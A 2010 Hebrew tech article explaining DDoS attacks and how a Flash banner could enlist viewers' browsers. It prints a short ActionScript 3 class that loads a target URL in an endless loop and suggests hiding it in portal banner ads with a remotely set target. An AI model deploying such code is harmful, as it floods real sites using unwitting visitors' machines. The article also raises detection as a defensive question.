התקפת DDoS באמצעות פלאש PDF הדפסה דוא
דירוג משתמש: / 0
גרועהכי טוב 
טכנולוגיה - טכנולוגיה כללי
השיעור נכתב על ידי : אלעד כהן   
ראשון, 15 אוגוסט 2010 03:54
התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט) מטרת התקיפה היא לגרום להשבתת פעילות הגורם…

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט).
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.


התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3
package
{
import flash.display.*;
import flash.events.*;
import flash.net.*;

public class DDoS extends MovieClip
{
public var Url:String = "http://www.website.com"; 
public var UrlLoader:URLLoader = new URLLoader();

public function DDoS() 
{
UrlLoader.addEventListener(Event.COMPLETE, Loop);

Loop();
}

private function Loop(e:Event=null):void
{
UrlLoader.load(new URLRequest(Url));
}}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)
 


המאמר נכתב ע"י אלעד כהן - מתכנת פלאש בחברת GAME DEV LTD (גיימדב בע"מ) העוסקת בפיתוח אפליקציות לפייסבוק, פיתוח אפליקציות לאייפון ופיתוח משחקי מחשב.

עוד מכותב זה
עוד מאמרים מכותב זה
טכנולוגיה כללי
בדיקת אבטחת מידע במספר משחקים באתר נענע המשחקים, המשחקים שנבדקו הם: ראש בקיר, נקמת המחוננים ומבחן IQ. בכל אחד מהמשחקים מוסבר איך להגיע...
טכנולוגיה כללי
פירוט ארכיטקטורת אתר צ'אט רולט ואת ושימוש בשרות Stratus של Adobe על מנת שגולשים יוכלו לתקשר אחד עם השני ישירות (P2P) ללא שימוש בשרת עם אפליקציה...
טכנולוגיה כללי
משחקים ואפליקציות בטכנולוגיות פלאש קלים להעתקה מכיוון שהמבנה בו נשמרים הנתונים ידוע לכל, מאמר זה יפרט מספר טכניקות להגנה מפני העתקה של...
טכנולוגיה כללי
אפליקציות AIR הן אפליקציות שנכתבו בפלאש, פלקס או Html ומותקנות על המחשב (כמו אפליקציות רגילות), אפליקציות AIR פועלות על גבי AIR Runtime, דבר המאפשר...
טכנולוגיה כללי
כשמפתחים אפליקציית פלאש אפשר להוסיף את האפשרות שכל פעולה שהמשתמש מבצע באפליקציה תישלח למחשב אחר ובמחשב האחר הפעולה שהמשתמש ביצע תוצג…
עוד בנושא
מאמרים קשורים
ביטוח חיים
  מחפשים בנות למטרות של הנאה? הצטרפו לחדרי הצ'אט המיוחדים שלנו. שם תמצאו את הבחורה הנכונה. שיחות סקס שיחות סקס? לא רק לאנשים חרמנים חסרי...
ניהול
האפשרויות הרבות העומדות בפני עובדים כיום מביאות עובדים לא מעטים לפרוץ את מחסום השכירות ולעבוד באופן עצמאי. לעתים מדובר בעסקים צדדיים...
מדעי התנהגות
  10 עובדות על הפרעה טורדנית כפייתית OCD 1. הפרעה טורדנית כפייתית מאופיינת במחשבות טורדניות, מעיקות, לא רצויות ופולשניות ובהתנהגויות...
צרכנות כללי
  כיום התפתח תחום עיצוב פנים באמצעות עבודות גבס, בעבר נעשה שימוש בגבס בשביל בניית קירות ומחיצות או תיקרות גבס הידועות בשם הנמכות, כיום...
ארועים - ארגון ארועים
על אף שטכנולוגיות VR הן יחסית חדשות לאירועים ובטח לקהל המיינסטרים, אנו מזהים יותר התעניינות בשימושים הרבים של מציאות מדומה לאירועים...
מאמרים אחרונים
מאמרים אחרונים
קידום אתרים
יש הרבה שאלות לגבי קידום אורגני לאתר שנבנה על וויקס. בין השאלות הנפוצות: האם אתרי וויקס ניתנים לקידום בגוגל? האם וויקס פחות מתאים לקידום...
בריאות ורפואה כללי
הגעתם לגיל הזהב, ועכשיו יש לכם זמן להנות מזמן פנוי לעצמכם, מגידול הנכדים בכיף ובאהבה, ומטיולים עם החברים הגמלאים שלכם. גיל הזהב אמנם יכול...
חוקים וחוזים
תמיד הצלחתם לקבל החלטות ביחד, אבל לאחרונה משהו מתחיל להשתבש? שמים לב שאתם והשותפים העסקיים שלכם כבר לא מתנהלים באותה צורה טובה כמו...
בריאות ורפואה כללי
טיפול דיאדי איך בונים ביטחון עצמי לילדים? אילו סוגי טיפולים מתאימים להורים – ואילו מתאימים לילדים? ואיך יודעים לאיזה מטפל כדאי לפנות?...
הקמת חברה עסק חדש
מיתוג - מסרים וקבוצות צבעים - ראו איזה קבוצה מקבוצות הצבעים הכי תתאים למותג שלכם: כולנו כבר מכירים ויודעים בדיוק מה משדר לנו האדום, ומה...
 

risom

התחברות לאתר






התחבר באמצעות:

STU2

מאמרים - כל הזכויות שמורות לפרסום אתרים באינטרנט מבית אקטיביטק בע"מ קידום אתרים